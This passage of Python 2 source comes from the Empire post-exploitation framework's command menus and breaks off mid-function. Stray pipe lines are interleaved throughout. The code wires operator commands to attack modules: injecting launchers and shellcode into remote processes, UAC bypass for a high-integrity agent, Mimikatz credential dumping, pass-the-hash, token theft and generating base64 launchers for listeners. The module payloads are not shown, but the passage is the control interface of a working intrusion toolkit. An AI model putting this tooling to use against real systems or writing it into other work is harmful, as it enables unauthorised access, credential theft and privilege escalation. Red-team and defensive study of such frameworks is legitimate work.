print helpers.color("[*] Profile format is \"TaskURI1,TaskURI2,...|UserAgent|OptionalHeader2:Val1|OptionalHeader2:Val2...\"")
|
|
|
|
|
|
|
|
|
|
|
|
def do_psinject(self, line):
|
|
|
|
"Inject a launcher into a remote process. Ex. psinject <listener> <pid>"
|
|
|
|
|
|
|
|
# get the info for the psinject module
|
|
|
|
if line:
|
|
|
|
listenerID = line.split(" ")[0].strip()
|
|
|
|
pid=''
|
|
|
|
|
|
|
|
if len(line.split(" "))==2:
|
|
|
|
pid = line.split(" ")[1].strip()
|
|
|
|
|
|
|
|
if self.mainMenu.modules.modules["management/psinject"]:
|
|
|
|
|
|
|
|
if listenerID != "" and self.mainMenu.listeners.is_listener_valid(listenerID):
|
|
|
|
|
|
|
|
module = self.mainMenu.modules.modules["management/psinject"]
|
|
|
|
module.options['Listener']['Value'] = listenerID
|
|
|
|
module.options['Agent']['Value']=self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
if pid != '':
|
|
|
|
module.options['ProcId']['Value'] = pid
|
|
|
|
|
|
|
|
l = ModuleMenu(self.mainMenu, "management/psinject")
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter <listenerName> <pid>")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] management/psinject module not loaded")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Injection requires you to specify listener")
|
|
|
|
|
|
|
|
|
|
|
|
def do_injectshellcode(self, line):
|
|
|
|
"Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>"
|
|
|
|
|
|
|
|
# get the info for the inject module
|
|
|
|
if line:
|
|
|
|
listenerID = line.split(" ")[0].strip()
|
|
|
|
pid=''
|
|
|
|
|
|
|
|
if len(line.split(" "))==2:
|
|
|
|
pid = line.split(" ")[1].strip()
|
|
|
|
|
|
|
|
if self.mainMenu.modules.modules["code_execution/invoke_shellcode"]:
|
|
|
|
|
|
|
|
if listenerID != "" and self.mainMenu.listeners.is_listener_valid(listenerID):
|
|
|
|
|
|
|
|
module = self.mainMenu.modules.modules["code_execution/invoke_shellcode"]
|
|
|
|
module.options['Listener']['Value'] = listenerID
|
|
|
|
module.options['Agent']['Value']=self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
if pid != '':
|
|
|
|
module.options['ProcessID']['Value'] = pid
|
|
|
|
|
|
|
|
l = ModuleMenu(self.mainMenu, "code_execution/invoke_shellcode")
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter <listenerName> <pid>")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] code_execution/invoke_shellcode module not loaded")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Injection requires you to specify listener")
|
|
|
|
|
|
|
|
|
|
|
|
def do_spawn(self, line):
|
|
|
|
"Spawns a new Empire agent for the given listener name. Ex. spawn <listener>"
|
|
|
|
|
|
|
|
# get the info for the spawn module
|
|
|
|
if line:
|
|
|
|
listenerID = line.split(" ")[0].strip()
|
|
|
|
pid=''
|
|
|
|
if len(line.split(" "))==2:
|
|
|
|
pid = line.split(" ")[1].strip()
|
|
|
|
|
|
|
|
if listenerID != "" and self.mainMenu.listeners.is_listener_valid(listenerID):
|
|
|
|
|
|
|
|
#ensure the inject module is loaded
|
|
|
|
if self.mainMenu.modules.modules["management/spawn"]:
|
|
|
|
module = self.mainMenu.modules.modules["management/spawn"]
|
|
|
|
|
|
|
|
module.options['Listener']['Value'] = listenerID
|
|
|
|
module.options['Agent']['Value']=self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
# jump to the spawn module
|
|
|
|
l = ModuleMenu(self.mainMenu, "management/spawn")
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] management/spawn module not loaded")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a valid listener name or ID.")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please specify a listener name or ID.")
|
|
|
|
|
|
|
|
|
|
|
|
def do_bypassuac(self, line):
|
|
|
|
"Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>"
|
|
|
|
|
|
|
|
# get the info for the bypassuac module
|
|
|
|
if line:
|
|
|
|
listenerID = line.split(" ")[0].strip()
|
|
|
|
pid=''
|
|
|
|
if len(line.split(" "))==2:
|
|
|
|
pid = line.split(" ")[1].strip()
|
|
|
|
|
|
|
|
if listenerID != "" and self.mainMenu.listeners.is_listener_valid(listenerID):
|
|
|
|
|
|
|
|
#ensure the inject module is loaded
|
|
|
|
if self.mainMenu.modules.modules["privesc/bypassuac"]:
|
|
|
|
module = self.mainMenu.modules.modules["privesc/bypassuac"]
|
|
|
|
|
|
|
|
module.options['Listener']['Value'] = listenerID
|
|
|
|
module.options['Agent']['Value']=self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
# jump to the spawn module
|
|
|
|
l = ModuleMenu(self.mainMenu, "privesc/bypassuac")
|
|
|
|
l.do_execute("")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] privesc/bypassuac module not loaded")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a valid listener name or ID.")
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please specify a listener name or ID.")
|
|
|
|
|
|
|
|
|
|
|
|
def do_mimikatz(self, line):
|
|
|
|
"Runs Invoke-Mimikatz on the client."
|
|
|
|
|
|
|
|
#ensure the credentials/mimiktaz/logonpasswords module is loaded
|
|
|
|
if self.mainMenu.modules.modules["credentials/mimikatz/logonpasswords"]:
|
|
|
|
module = self.mainMenu.modules.modules["credentials/mimikatz/logonpasswords"]
|
|
|
|
|
|
|
|
module.options['Agent']['Value']=self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
# execute the Mimikatz module
|
|
|
|
l = ModuleMenu(self.mainMenu, "credentials/mimikatz/logonpasswords")
|
|
|
|
l.do_execute("")
|
|
|
|
|
|
|
|
|
|
|
|
def do_pth(self, line):
|
|
|
|
"Executes PTH for a CredID through Mimikatz."
|
|
|
|
|
|
|
|
credID = line.strip()
|
|
|
|
|
|
|
|
if credID == "":
|
|
|
|
print helpers.color("[!] Please specify a <CredID>.")
|
|
|
|
return
|
|
|
|
|
|
|
|
if self.mainMenu.modules.modules["credentials/mimikatz/pth"]:
|
|
|
|
# reload the module to reset the default values
|
|
|
|
module = self.mainMenu.modules.reload_module("credentials/mimikatz/pth")
|
|
|
|
|
|
|
|
module = self.mainMenu.modules.modules["credentials/mimikatz/pth"]
|
|
|
|
|
|
|
|
# set mimikt/pth to use the given CredID
|
|
|
|
module.options['CredID']['Value'] = credID
|
|
|
|
|
|
|
|
# set the agent ID
|
|
|
|
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
# execute the mimikatz/pth module
|
|
|
|
l = ModuleMenu(self.mainMenu, "credentials/mimikatz/pth")
|
|
|
|
l.do_execute("")
|
|
|
|
|
|
|
|
|
|
|
|
def do_steal_token(self, line):
|
|
|
|
"Uses credentials/tokens to impersonate a token for a given process ID."
|
|
|
|
|
|
|
|
processID = line.strip()
|
|
|
|
|
|
|
|
if processID == "":
|
|
|
|
print helpers.color("[!] Please specify a process ID.")
|
|
|
|
return
|
|
|
|
|
|
|
|
if self.mainMenu.modules.modules["credentials/tokens"]:
|
|
|
|
# reload the module to reset the default values
|
|
|
|
module = self.mainMenu.modules.reload_module("credentials/tokens")
|
|
|
|
|
|
|
|
module = self.mainMenu.modules.modules["credentials/tokens"]
|
|
|
|
|
|
|
|
# set credentials/token to impersonate the given process ID token
|
|
|
|
module.options['ImpersonateUser']['Value'] = "True"
|
|
|
|
module.options['ProcessID']['Value'] = processID
|
|
|
|
|
|
|
|
# set the agent ID
|
|
|
|
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
# execute the token module
|
|
|
|
l = ModuleMenu(self.mainMenu, "credentials/tokens")
|
|
|
|
l.do_execute("")
|
|
|
|
|
|
|
|
|
|
|
|
def do_revtoself(self, line):
|
|
|
|
"Uses credentials/tokens to revert token privileges."
|
|
|
|
|
|
|
|
if self.mainMenu.modules.modules["credentials/tokens"]:
|
|
|
|
# reload the module to reset the default values
|
|
|
|
module = self.mainMenu.modules.reload_module("credentials/tokens")
|
|
|
|
|
|
|
|
module = self.mainMenu.modules.modules["credentials/tokens"]
|
|
|
|
|
|
|
|
# set credentials/token to revert to self
|
|
|
|
module.options['RevToSelf']['Value'] = "True"
|
|
|
|
|
|
|
|
# set the agent ID
|
|
|
|
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
# execute the token module
|
|
|
|
l = ModuleMenu(self.mainMenu, "credentials/tokens")
|
|
|
|
l.do_execute("")
|
|
|
|
|
|
|
|
|
|
|
|
def do_creds(self, line):
|
|
|
|
"Display/return credentials from the database."
|
|
|
|
self.mainMenu.do_creds(line)
|
|
|
|
|
|
|
|
|
|
|
|
def do_listeners(self, line):
|
|
|
|
"Jump to the listeners menu."
|
|
|
|
l = ListenerMenu(self.mainMenu)
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_agents(self, line):
|
|
|
|
"Jump to the Agents menu."
|
|
|
|
a = AgentsMenu(self.mainMenu)
|
|
|
|
a.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def complete_psinject(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete psinject option values."
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in self.mainMenu.listeners.get_listener_names() if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_injectshellcode(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete injectshellcode option values."
|
|
|
|
|
|
|
|
return self.complete_psinject(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_spawn(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete spawn option values."
|
|
|
|
|
|
|
|
return self.complete_psinject(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_bypassuac(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete bypassuac option values."
|
|
|
|
|
|
|
|
return self.complete_psinject(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_jobs(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete jobs management options."
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in ["kill"] if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_shell(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a shell command"
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in self.shellCmds if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_scriptimport(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a PowerShell script path"
|
|
|
|
|
|
|
|
return helpers.complete_path(text,line)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_scriptcmd(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a script cmd set."
|
|
|
|
|
|
|
|
functions = self.mainMenu.agents.get_agent_functions(self.sessionID)
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in functions if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_usemodule(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an Empire PowerShell module path"
|
|
|
|
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_upload(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an upload file path"
|
|
|
|
return helpers.complete_path(text,line)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_updateprofile(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an updateprofile path"
|
|
|
|
return helpers.complete_path(text,line)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_creds(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete 'creds' commands."
|
|
|
|
return self.mainMenu.complete_creds(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class ListenerMenu(cmd.Cmd):
|
|
|
|
|
|
|
|
def __init__(self, mainMenu):
|
|
|
|
cmd.Cmd.__init__(self)
|
|
|
|
self.doc_header = 'Listener Commands'
|
|
|
|
|
|
|
|
self.mainMenu = mainMenu
|
|
|
|
|
|
|
|
# get all the the stock listener options
|
|
|
|
self.options = self.mainMenu.listeners.get_listener_options()
|
|
|
|
|
|
|
|
# set the prompt text
|
|
|
|
self.prompt = '(Empire: '+helpers.color("listeners", color="blue")+') > '
|
|
|
|
|
|
|
|
# display all active listeners on menu startup
|
|
|
|
messages.display_listeners(self.mainMenu.listeners.get_listeners())
|
|
|
|
|
|
|
|
|
|
|
|
# print a nicely formatted help menu
|
|
|
|
# stolen/adapted from recon-ng
|
|
|
|
def print_topics(self, header, cmds, cmdlen, maxcol):
|
|
|
|
if cmds:
|
|
|
|
self.stdout.write("%s\n"%str(header))
|
|
|
|
if self.ruler:
|
|
|
|
self.stdout.write("%s\n"%str(self.ruler * len(header)))
|
|
|
|
for cmd in cmds:
|
|
|
|
self.stdout.write("%s %s\n" % (cmd.ljust(17), getattr(self, 'do_' + cmd).__doc__))
|
|
|
|
self.stdout.write("\n")
|
|
|
|
|
|
|
|
|
|
|
|
def emptyline(self): pass
|
|
|
|
|
|
|
|
|
|
|
|
def do_exit(self, line):
|
|
|
|
"Exit Empire."
|
|
|
|
raise SystemExit
|
|
|
|
|
|
|
|
|
|
|
|
def do_list(self, line):
|
|
|
|
"List all active listeners."
|
|
|
|
messages.display_listeners(self.mainMenu.listeners.get_listeners())
|
|
|
|
|
|
|
|
|
|
|
|
def do_back(self, line):
|
|
|
|
"Go back a menu."
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def do_main(self, line):
|
|
|
|
"Go back to the main menu."
|
|
|
|
raise StopIteration
|
|
|
|
|
|
|
|
|
|
|
|
def do_set(self, line):
|
|
|
|
"Set a listener option."
|
|
|
|
parts = line.split(" ")
|
|
|
|
if len(parts) > 1:
|
|
|
|
self.mainMenu.listeners.set_listener_option(parts[0], " ".join(parts[1:]))
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a value to set for the option")
|
|
|
|
|
|
|
|
|
|
|
|
def do_unset(self, line):
|
|
|
|
"Unset a listener option."
|
|
|
|
option = line.strip()
|
|
|
|
self.mainMenu.listeners.set_listener_option(option, '')
|
|
|
|
|
|
|
|
|
|
|
|
def do_info(self, line):
|
|
|
|
"Display listener options."
|
|
|
|
|
|
|
|
parts = line.split(" ")
|
|
|
|
|
|
|
|
if parts[0] != '':
|
|
|
|
if self.mainMenu.listeners.is_listener_valid(parts[0]):
|
|
|
|
listener = self.mainMenu.listeners.get_listener(parts[0])
|
|
|
|
messages.display_listener_database(listener)
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a valid listener name or ID")
|
|
|
|
else:
|
|
|
|
messages.display_listener(self.mainMenu.listeners.options)
|
|
|
|
|
|
|
|
|
|
|
|
def do_options(self, line):
|
|
|
|
"Display listener options."
|
|
|
|
|
|
|
|
parts = line.split(" ")
|
|
|
|
|
|
|
|
if parts[0] != '':
|
|
|
|
if self.mainMenu.listeners.is_listener_valid(parts[0]):
|
|
|
|
listener = self.mainMenu.listeners.get_listener(parts[0])
|
|
|
|
messages.display_listener_database(listener)
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a valid listener name or ID")
|
|
|
|
else:
|
|
|
|
messages.display_listener(self.mainMenu.listeners.options)
|
|
|
|
|
|
|
|
|
|
|
|
def do_kill(self, line):
|
|
|
|
"Kill one or all active listeners."
|
|
|
|
|
|
|
|
listenerID = line.strip()
|
|
|
|
|
|
|
|
if listenerID.lower() == "all":
|
|
|
|
try:
|
|
|
|
choice = raw_input(helpers.color("[>] Kill all listeners? [y/N] ", "red"))
|
|
|
|
if choice.lower() != "" and choice.lower()[0] == "y":
|
|
|
|
self.mainMenu.listeners.killall()
|
|
|
|
except KeyboardInterrupt as e: print ""
|
|
|
|
|
|
|
|
else:
|
|
|
|
if listenerID != "" and self.mainMenu.listeners.is_listener_valid(listenerID):
|
|
|
|
self.mainMenu.listeners.shutdown_listener(listenerID)
|
|
|
|
self.mainMenu.listeners.delete_listener(listenerID)
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Invalid listener name or ID.")
|
|
|
|
|
|
|
|
|
|
|
|
def do_execute(self, line):
|
|
|
|
"Execute a listener with the currently specified options."
|
|
|
|
self.mainMenu.listeners.add_listener_from_config()
|
|
|
|
|
|
|
|
|
|
|
|
def do_agents(self, line):
|
|
|
|
"Jump to the Agents menu."
|
|
|
|
a = AgentsMenu(self.mainMenu)
|
|
|
|
a.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_usestager(self, line):
|
|
|
|
"Use an Empire stager."
|
|
|
|
|
|
|
|
parts = line.split(" ")
|
|
|
|
|
|
|
|
if parts[0] not in self.mainMenu.stagers.stagers:
|
|
|
|
print helpers.color("[!] Error: invalid stager module")
|
|
|
|
|
|
|
|
elif len(parts) == 1:
|
|
|
|
l = StagerMenu(self.mainMenu, parts[0])
|
|
|
|
l.cmdloop()
|
|
|
|
elif len(parts) == 2:
|
|
|
|
listener = parts[1]
|
|
|
|
if not self.mainMenu.listeners.is_listener_valid(listener):
|
|
|
|
print helpers.color("[!] Please enter a valid listener name or ID")
|
|
|
|
else:
|
|
|
|
self.mainMenu.stagers.set_stager_option('Listener', listener)
|
|
|
|
l = StagerMenu(self.mainMenu, parts[0])
|
|
|
|
l.cmdloop()
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Error in ListenerMenu's do_userstager()")
|
|
|
|
|
|
|
|
|
|
|
|
def do_launcher(self, line):
|
|
|
|
"Generate an initial launcher for a listener."
|
|
|
|
|
|
|
|
nameid = self.mainMenu.listeners.get_listener_id(line.strip())
|
|
|
|
if nameid :
|
|
|
|
listenerID = nameid
|
|
|
|
else:
|
|
|
|
listenerID = line.strip()
|
|
|
|
|
|
|
|
if listenerID != "" and self.mainMenu.listeners.is_listener_valid(listenerID):
|
|
|
|
# set the listener value for the launcher
|
|
|
|
stager = self.mainMenu.stagers.stagers["launcher"]
|
|
|
|
stager.options['Listener']['Value'] = listenerID
|
|
|
|
stager.options['Base64']['Value'] = "True"
|
|
|
|
|
|
|
|
# and generate the code
|
|
|
|
print stager.generate()
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a valid listenerID")
|
|
|
|
|
|
|
|
|
|
|
|
def complete_set(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete listener option values."
|
|
|
|
|
|
|
|
if line.split(" ")[1].lower() == "host":
|
|
|
|
return ["http://" + helpers.lhost()]
|
|
|
|
|
|
|
|
elif line.split(" ")[1].lower() == "redirecttarget":
|
|
|
|
# if we're tab-completing a listener name, return all the names
|
|
|
|
listenerNames = self.mainMenu.listeners.get_listener_names()
|
|
|
|
|
|
|
|
endLine = " ".join(line.split(" ")[1:])
|
|
|
|
mline = endLine.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in listenerNames if s.startswith(mline)]
|
|
|
|
|
|
|
|
elif line.split(" ")[1].lower() == "type":
|
|
|
|
# if we're tab-completing the listener type
|
|
|
|
listenerTypes = ["native", "pivot", "hop", "foreign"]
|
|
|
|
endLine = " ".join(line.split(" ")[1:])
|
|
|
|
mline = endLine.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in listenerTypes if s.startswith(mline)]
|
|
|
|
|
|
|
|
elif line.split(" ")[1].lower() == "certpath":
|
|
|
|
return helpers.complete_path(text,line,arg=True)
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in self.options if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_unset(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete listener option values."
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in self.options if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_usestager(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an Empire stager module path."
|
|
|
|
return self.mainMenu.complete_usestager(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_kill(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete listener names"
|
|
|
|
|
|
|
|
# get all the listener names
|
|
|
|
names = self.mainMenu.listeners.get_listener_names() + ["all"]
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in names if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_launcher(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete listener names/IDs"
|
|
|
|
|
|
|
|
# get all the listener names
|
|
|
|
names = self.mainMenu.listeners.get_listener_names()
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in names if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_info(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete listener names/IDs"
|
|
|
|
return self.complete_launcher(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_options(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete listener names/IDs"
|
|
|
|
return self.complete_launcher(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
class ModuleMenu(cmd.Cmd):
|
|
|
|
|
|
|
|
def __init__(self, mainMenu, moduleName, agent=None):
|
|
|
|
cmd.Cmd.__init__(self)
|
|
|
|
self.doc_header = 'Module Commands'
|
|
|
|
|
|
|
|
self.mainMenu = mainMenu
|
|
|
|
|
|
|
|
# get the current module/name
|
|
|
|
self.moduleName = moduleName
|
|
|
|
self.module = self.mainMenu.modules.modules[moduleName]
|
|
|
|
|
|
|
|
# set the prompt text
|
|
|
|
self.prompt = '(Empire: '+helpers.color(self.moduleName, color="blue")+') > '
|
|
|
|
|
|
|
|
# if this menu is being called from an agent menu
|
|
|
|
if agent:
|
|
|
|
# resolve the agent sessionID to a name, if applicable
|
|
|
|
agent = self.mainMenu.agents.get_agent_name(agent)
|
|
|
|
self.module.options['Agent']['Value'] = agent
|
|
|
|
|
|
|
|
|
|
|
|
def validate_options(self):
|
|
|
|
"Make sure all required module options are completed."
|
|
|
|
|
|
|
|
sessionID = self.module.options['Agent']['Value']
|
|
|
|
|
|
|
|
for option,values in self.module.options.iteritems():
|
|
|
|
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
|
|
|
|
print helpers.color("[!] Error: Required module option missing.")
|
|
|
|
return False
|
|
|
|
|
|
|
|
try:
|
|
|
|
# if we're running this module for all agents, skip this validation
|
|
|
|
if sessionID.lower() != "all":
|
|
|
|
modulePSVersion = int(self.module.info['MinPSVersion'])
|
|
|
|
agentPSVersion = int(self.mainMenu.agents.get_ps_version(sessionID))
|
|
|
|
# check if the agent/module PowerShell versions are compatible
|
|
|
|
if modulePSVersion > agentPSVersion:
|
|
|
|
print helpers.color("[!] Error: module requires PS version "+str(modulePSVersion)+" but agent running PS version "+str(agentPSVersion))
|
|
|
|
return False
|
|
|
|
except Exception as e:
|
|
|
|
print "exception: ",e
|
|
|
|
print helpers.color("[!] Invalid module or agent PS version!")
|
|
|
|
return False
|
|
|
|
|
|
|
|
# check if the module needs admin privs
|
|
|
|
if self.module.info['NeedsAdmin']:
|
|
|
|
# if we're running this module for all agents, skip this validation
|
|
|
|
if sessionID.lower() != "all":
|
|
|
|
if not self.mainMenu.agents.is_agent_elevated(sessionID):
|
|
|
|
print helpers.color("[!] Error: module needs to run in an elevated context.")
|
|
|
|
return False
|
|
|
|
|
|
|
|
# if the module isn't opsec safe, prompt before running
|
|
|
|
if not self.module.info['OpsecSafe']:
|
|
|
|
try:
|
|
|
|
choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red"))
|
|
|
|
if not (choice.lower() != "" and choice.lower()[0] == "y"):
|
|
|
|
return False
|
|
|
|
except KeyboardInterrupt as e:
|
|
|
|
print ""
|
|
|
|
return False
|
|
|
|
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def emptyline(self): pass
|
|
|
|
|
|
|
|
|
|
|
|
# print a nicely formatted help menu
|
|
|
|
# stolen/adapted from recon-ng
|
|
|
|
def print_topics(self, header, cmds, cmdlen, maxcol):
|
|
|
|
if cmds:
|
|
|
|
self.stdout.write("%s\n"%str(header))
|
|
|
|
if self.ruler:
|
|
|
|
self.stdout.write("%s\n"%str(self.ruler * len(header)))
|
|
|
|
for cmd in cmds:
|
|
|
|
self.stdout.write("%s %s\n" % (cmd.ljust(17), getattr(self, 'do_' + cmd).__doc__))
|
|
|
|
self.stdout.write("\n")
|
|
|
|
|
|
|
|
|
|
|
|
def do_agents(self, line):
|
|
|
|
"Jump to the Agents menu."
|
|
|
|
a = AgentsMenu(self.mainMenu)
|
|
|
|
a.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_listeners(self, line):
|
|
|
|
"Jump to the listeners menu."
|
|
|
|
l = ListenerMenu(self.mainMenu)
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_exit(self, line):
|
|
|
|
"Exit Empire."
|
|
|
|
raise SystemExit
|
|
|
|
|
|
|
|
|
|
|
|
def do_main(self, line):
|
|
|
|
"Return to the main menu."
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def do_reload(self, line):
|
|
|
|
"Reload the current module."
|
|
|
|
|
|
|
|
print "\n" + helpers.color("[*] Reloading module") + "\n"
|
|
|
|
|
|
|
|
# reload the specific module
|
|
|
|
self.mainMenu.modules.reload_module(self.moduleName)
|
|
|
|
# regrab the reference
|
|
|
|
self.module = self.mainMenu.modules.modules[self.moduleName]
|
|
|
|
|
|
|
|
|
|
|
|
def do_info(self, line):
|
|
|
|
"Display module options."
|
|
|
|
messages.display_module(self.moduleName, self.module)
|
|
|
|
|
|
|
|
|
|
|
|
def do_options(self, line):
|
|
|
|
"Display module options."
|
|
|
|
messages.display_module(self.moduleName, self.module)
|
|
|
|
|
|
|
|
|
|
|
|
def do_back(self, line):
|
|
|
|
"Return to the main menu."
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def do_main(self, line):
|
|
|
|
"Go back to the main menu."
|
|
|
|
raise StopIteration
|
|
|
|
|
|
|
|
|
|
|
|
def do_set(self, line):
|
|
|
|
"Set a module option."
|
|
|
|
|
|
|
|
parts = line.split()
|
|
|
|
|
|
|
|
try:
|
|
|
|
option = parts[0]
|
|
|
|
if option not in self.module.options:
|
|
|
|
print helpers.color("[!] Invalid option specified.")
|
|
|
|
|
|
|
|
elif len(parts) == 1 :
|
|
|
|
# "set OPTION"
|
|
|
|
# check if we're setting a switch
|
|
|
|
if self.module.options[option]['Description'].startswith("Switch."):
|
|
|
|
self.module.options[option]['Value'] = "True"
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please specify an option value.")
|
|
|
|
else:
|
|
|
|
# otherwise "set OPTION VALUE"
|
|
|
|
option = parts[0]
|
|
|
|
value = " ".join(parts[1:])
|
|
|
|
|
|
|
|
if value == '""' or value == "''": value = ""
|
|
|
|
|
|
|
|
self.module.options[option]['Value'] = value
|
|
|
|
except:
|
|
|
|
print helpers.color("[!] Error in setting option, likely invalid option name.")
|
|
|
|
|
|
|
|
|
|
|
|
def do_unset(self, line):
|
|
|
|
"Unset a module option."
|
|
|
|
|
|
|
|
option = line.split()[0]
|
|
|
|
|
|
|
|
if line.lower() == "all":
|
|
|
|
for option in self.module.options:
|
|
|
|
self.module.options[option]['Value'] = ''
|
|
|
|
if option not in self.module.options:
|
|
|
|
print helpers.color("[!] Invalid option specified.")
|
|
|
|
else:
|
|
|
|
self.module.options[option]['Value'] = ''
|
|
|
|
|
|
|
|
|
|
|
|
def do_usemodule(self, line):
|
|
|
|
"Use an Empire PowerShell module."
|
|
|
|
|
|
|
|
module = line.strip()
|
|
|
|
|
|
|
|
if module not in self.mainMenu.modules.modules:
|
|
|
|
print helpers.color("[!] Error: invalid module")
|
|
|
|
else:
|
|
|
|
l = ModuleMenu(self.mainMenu, line, agent=self.module.options['Agent']['Value'])
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_creds(self, line):
|
|
|
|
"Display/return credentials from the database."
|
|
|
|
self.mainMenu.do_creds(line)
|
|
|
|
|
|
|
|
|
|
|
|
def do_execute(self, line):
|
|
|
|
"Execute the given Empire module."
|
|
|
|
|
|
|
|
if not self.validate_options():
|
|
|
|
return
|
|
|
|
|
|
|
|
